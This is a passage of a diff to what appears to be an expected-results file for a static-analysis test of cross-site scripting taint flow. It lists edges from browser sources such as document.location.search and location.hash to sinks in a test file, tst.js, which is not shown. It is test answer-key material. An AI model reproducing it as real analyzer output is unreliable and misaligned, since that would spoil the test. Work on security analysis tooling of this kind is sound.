tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... 
search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... 
.search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... 
.search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... 
Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... 
hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... 
.search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... 
bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... 
.search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... 
t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... 
ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... 
search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... 
.search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... 
.search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... 
Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... 
hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... 
